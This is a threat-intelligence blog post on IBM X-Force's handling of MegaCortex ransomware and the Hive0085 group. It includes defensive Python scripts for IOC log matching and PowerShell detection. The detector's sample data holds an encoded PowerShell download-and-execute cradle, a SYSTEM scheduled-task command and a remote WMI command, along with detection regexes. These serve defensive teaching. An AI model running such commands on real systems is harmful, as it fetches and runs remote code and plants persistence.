How Cybersecurity Threat Intelligence Teams Spot Attacks Before They Start


A thorough cybersecurity threat intelligence team turns each threat it encounters into a tool for future protection. Its job is to research threat groups’ motivations and capabilities, so that the next time one of those groups appears the organization is defended with far more context than it had the first time.

Strong cybersecurity threat intelligence about who attackers are and what they want can help an organization in a critical moment. For example, if an attacker is already on the network, defenders need to act swiftly before significant damage is done. After that critical moment has passed, the intelligence gathered along the way can be fed back into the team’s platforms and data sets to inform incident response consultants and managed security clients.

IBM’s X-Force Incident Response and Intelligence Service analysts have observed many real-world threat groups. Read on to learn the value threat group data brings to the table. Plus, explore some specific actions organizations can take to help defend themselves.

Cybersecurity Threat Intelligence in Action: MegaCortex

Last year, cybersecurity threat intelligence helped stop a MegaCortex ransomware attack before it was executed. In turn, this saved the client organization from damages that had the potential to stretch to $239 million or more. Several threat intelligence insights warned that the attackers were likely preparing to deploy ransomware. The threat intelligence team advised incident responders and the client to remain vigilant: the threat actors could turn destructive if they suspected they had been detected, and could deploy ransomware within hours.

Preparing for the worst paid off. On a Saturday afternoon, the attacker uploaded MegaCortex ransomware and related deployment tools to one of the compromised systems. Incident response quickly advised the client that the attack was in progress, and IBM and the organization executed the containment and eradication steps they had already planned. Because IBM’s intelligence team had already mapped the attacker’s command and control infrastructure, it could give the client the C2 IP addresses to block, prioritized by the activity actually observed in the client’s environment.

Use Intelligence Now and In The Future

This attempted attack shows how important cybersecurity threat intelligence can be for incident response. Knowing the attacker’s intentions, capabilities, likely next moves, command and control infrastructure, malware capabilities and indicators of compromise (IOCs) played a pivotal role in keeping the incident response team and the client ahead of the attacker.

In addition, greater intelligence in an incident response practice allows for ongoing research and awareness. In this case, the cybersecurity threat intelligence team has been able to warn additional organizations about MegaCortex attack techniques, such as malicious outbound communications, Cobalt Strike and lateral movement.

Other Ransomware Attack Patterns

In addition to MegaCortex, X-Force incident response teams have observed multiple ransomware attackers at work over the past several years. One pattern seen repeatedly over the past year begins with the compromise of a Citrix server, usually with previously stolen credentials. The attacker then uses PowerShell and Cobalt Strike to move laterally before deploying ransomware.

In two particular incidents, the malware, IOCs and other artifacts in these attacks were so similar that our team was able to quickly replicate our analysis and fix problems faster. This is an excellent example of the power of cybersecurity threat intelligence because the knowledge we gained from one incident helped us analyze and remediate other incidents involving similar techniques.

Tracking Hive0085

Cybersecurity threat intelligence teams should conduct extensive research on several cybercriminal groups using multiple tools and methods. IBM does this by investigating their malicious campaigns using a variety of open, enterprise and IBM tools and repositories. IBM also tracks sales and activity on the dark web, and uses Quad9 DNS data to track malicious IPs and domains associated with the threat groups it follows.

In one particular instance, IBM saw that the group Hive0085 had purchased on the dark web several command and control domains for a backdoor called ‘more_eggs.’ Using data available to IBM through Quad9, we noticed this command and control network was very active, suggesting the group was engaged in an ongoing campaign. We used this data to alert the victim to an active campaign against their network, which gave the organization’s team valuable time to identify and try to stop the group. The information we had cultivated over months of research, combined with a proactive approach, allowed us to provide timely, actionable intelligence to the company in a critical moment.
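The C2 blocking in the MegaCortex case and the more_eggs domain tracking above both come down to the same mechanical step: checking an intelligence-supplied indicator set against what the network actually did. The script below is an added illustration of that step, not IBM’s or Quad9’s tooling. The indicators, hosts and log lines are constructed (RFC 5737 documentation address ranges and the reserved .example TLD), and it assumes firewall lines of the form ‘src=… dst=…’ and DNS lines of the form ‘client=… query=…’.

```python
"""Check firewall and DNS logs against an intelligence-supplied IOC set.

Added example, not IBM's tooling. Every indicator and log line below is
constructed from RFC 5737 documentation ranges and the reserved .example TLD.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed IOC set: exact C2 addresses, a netblock the actor is assumed to
# rent, and C2 domains (matched together with any subdomain, since beacons
# often use per-victim host labels under the registered domain).
C2_IPS = {"203.0.113.45", "203.0.113.46"}
C2_NETS = [ipaddress.ip_network("198.51.100.0/28")]
C2_DOMAINS = {"update-cdn.example", "login-portal.example"}

# Constructed log lines in two simple formats (assumed, not a vendor format).
SAMPLE_LOGS = [
    "14:02:11 src=10.0.5.23 dst=192.0.2.10 action=allow",
    "14:02:15 src=10.0.5.23 dst=203.0.113.45 action=allow",
    "14:03:02 client=10.0.5.23 query=beacon.update-cdn.example.",
    "14:03:40 client=10.0.7.8 query=intranet.corp.example",
    "14:05:13 src=10.0.7.8 dst=198.51.100.7 action=deny",
]

FW_RE = re.compile(r"src=(?P<src>\S+)\s+dst=(?P<dst>\S+)")
DNS_RE = re.compile(r"client=(?P<src>\S+)\s+query=(?P<q>\S+)")


@dataclass
class Hit:
    line_no: int
    host: str       # internal host that talked (or tried to talk) to the C2
    kind: str       # "ip" or "domain"
    indicator: str  # the IOC or netblock that matched


def match_ip(addr: str) -> Optional[str]:
    """Exact-IP match first, then netblock containment."""
    if addr in C2_IPS:
        return addr
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net in C2_NETS:
        if ip in net:
            return str(net)
    return None


def match_domain(name: str) -> Optional[str]:
    """Match the domain itself or any subdomain, anchored on a label boundary."""
    name = name.lower().rstrip(".")  # DNS logs often carry a trailing dot
    for d in C2_DOMAINS:
        if name == d or name.endswith("." + d):
            return d
    return None


def scan(lines: List[str]) -> List[Hit]:
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        m = FW_RE.search(line)
        if m:
            ioc = match_ip(m["dst"])
            if ioc:
                hits.append(Hit(n, m["src"], "ip", ioc))
            continue
        m = DNS_RE.search(line)
        if m:
            ioc = match_domain(m["q"])
            if ioc:
                hits.append(Hit(n, m["src"], "domain", ioc))
    return hits


def hosts_to_contain(hits: List[Hit]) -> List[str]:
    """Internal hosts to isolate. A denied connection still counts: the host
    tried to beacon, so it is compromised even though the packet was dropped."""
    return sorted({h.host for h in hits})


if __name__ == "__main__":
    found = scan(SAMPLE_LOGS)
    for h in found:
        print(h)
    print("contain:", hosts_to_contain(found))
```

Two details matter in practice: the domain match is anchored on a label boundary, so ‘notupdate-cdn.example’ does not match ‘update-cdn.example’, and a denied connection to a C2 address is reported as a compromised host needing containment rather than ignored as a non-event.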

Teaching Cybersecurity Threat Intelligence In Your Business

Researching threat actors and their techniques tells us how these threat groups behave and which tactics they are most likely to use. Below are some of the more common tactics, techniques and procedures we observe advanced persistent threat groups using, each paired with strategies that, alongside a cybersecurity threat intelligence team, help combat the tactic and mitigate the risk from these top-tier actors.

Tactic, technique or procedure: Spear phishing
  Observed: Of the threat groups we track, nearly 84% use phishing as an infection vector. Of those, 64% appear to use it as their primary infection vector.
  Risk mitigation tactics: Apply banners to emails coming from outside your company; use Quad9 to block activity from malicious domains; employ multifactor authentication; educate employees on the latest phishing techniques; and regularly test your organization to determine the likelihood of a successful phishing attack.

Tactic, technique or procedure: Watering hole attacks
  Observed: Nearly 27% of the advanced persistent threat groups we track use watering hole techniques.
  Risk mitigation tactics: Take measures to hide your organization’s online activities through the use of a virtual private network (VPN) or other measures; employ a robust patch management program to keep software up to date; and detect anomalous behavior through user behavior analytics or an intrusion prevention system.

Tactic, technique or procedure: Living off the land
  Observed: Multiple threat groups use tools inherent in an operating system, such as PowerShell, adfind, autorun registry entries, RemoteExec, WinRAR, WMI, scheduled tasks and others.
  Risk mitigation tactics: Use an application inventory to find unpatched or outdated applications; employ a robust endpoint detection and response (EDR) tool; monitor for the commands threat actors typically use to execute PowerShell; and use threat hunting to proactively identify threats in your network.

Tactic, technique or procedure: Zero-day exploits
  Observed: At least 23% of the threat groups we track are known to use zero-day exploits to compromise victims.
  Risk mitigation tactics: Analyze user behavior to detect anomalous activity resulting from a zero-day exploit, and stay up to date on new types of threats and patches to mitigate the risk once it is detected.
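The living-off-the-land entry above recommends monitoring for the commands threat actors use to run PowerShell. The detector below is an added example of what that looks like over process-creation events (Sysmon event 1 or Windows 4688 style, reduced here to host, parent image, image and command line). It is not IBM’s detection content; the events are constructed, the ‘image’ field is assumed to hold the executable basename, and the rule set is a starting point rather than a complete signature library. It decodes -EncodedCommand payloads before inspecting them, since that is the usual way a download cradle is hidden from naive command-line matching.

```python
"""Flag living-off-the-land command lines in process-creation events.

Added example, not IBM detection content. Events are constructed; rules are a
starting point, not an exhaustive signature set.
"""
import base64
import re
from typing import Dict, List

# Office applications spawning PowerShell is a classic phishing-to-execution chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# "-e", "-ec", "-enc" or "-EncodedCommand" followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download cradles and in-memory execution primitives.
CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b"
    r"|Invoke-Expression|FromBase64String", re.I)
# Flags used to run quietly without a profile or visible window.
STEALTH_RE = re.compile(
    r"-nop\b|-noprofile|-noni\b|-noninteractive|-w(?:indowstyle)?\s+hidden", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def analyze(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules the event matches (empty list if benign)."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    hits: List[str] = []

    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append("powershell_encoded_command")
        # Inspect the visible command line and the decoded payload together,
        # so a cradle hidden behind -enc is still caught.
        if CRADLE_RE.search(cmd + "\n" + decoded):
            hits.append("powershell_download_cradle")
        if STEALTH_RE.search(cmd):
            hits.append("powershell_hidden_or_noprofile")
        if parent in OFFICE_PARENTS:
            hits.append("office_spawns_powershell")
    elif image == "adfind.exe":
        hits.append("ad_enumeration_adfind")
    elif image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        hits.append("scheduled_task_creation")
    elif image == "wmic.exe" and re.search(r"/node:.*process\s+call\s+create", cmd, re.I):
        hits.append("wmi_remote_process_create")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only events that matched at least one rule."""
    out = []
    for e in events:
        rules = analyze(e)
        if rules:
            out.append({"host": e["host"], "image": e["image"], "rules": rules})
    return out


def _encode(ps: str) -> str:
    """Build an -EncodedCommand blob the way PowerShell expects it (UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed events; 198.51.100.7 is an RFC 5737 documentation address.
SAMPLE_EVENTS = [
    {"host": "WS-104", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"host": "WS-104", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"host": "DC01", "parent": "cmd.exe", "image": "adfind.exe",
     "cmdline": "adfind.exe -f (objectcategory=computer) -csv"},
    {"host": "WS-211", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /tn "Update" /tr C:\\Windows\\Temp\\x.exe /sc once /st 00:00 /ru SYSTEM'},
    {"host": "WS-211", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": 'wmic /node:FS01 process call create "cmd /c c:\\temp\\m.bat"'},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The encoded blob is decoded and concatenated with the visible command line before the cradle regex runs, so ‘IEX (New-Object Net.WebClient)…’ is caught even though only base64 appears in the log. On a real estate the Office-parent and encoded-command rules are the low-noise ones; the stealth-flag rule fires on some legitimate administration scripts and is better used as a scoring input than as an alert on its own.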

Embedding Intelligence Into Security

Organizations can include cybersecurity threat intelligence in their risk management models to account for likely threat actors, infection methods and likely impacts. Understanding where threats are likely to come from helps an organization prioritize which threat sources and threat events to watch, using up-to-date information about threat groups’ tactics. In addition, this intelligence can be incorporated into incident response plans and used to inform senior leaders and board members about key threats.

There are several ways companies can request custom cybersecurity threat intelligence research and analysis. First, a strategic threat assessment can provide cybersecurity threat intelligence tailored to one organization. Second, intelligence can be delivered as part of an incident response retainer, or accessed through data sharing platforms such as TruSTAR. Knowing which threat groups are likely to target you, what they want and what they can do improves your security team’s effectiveness today and tomorrow.

The post How Cybersecurity Threat Intelligence Teams Spot Attacks Before They Start appeared first on Security Intelligence.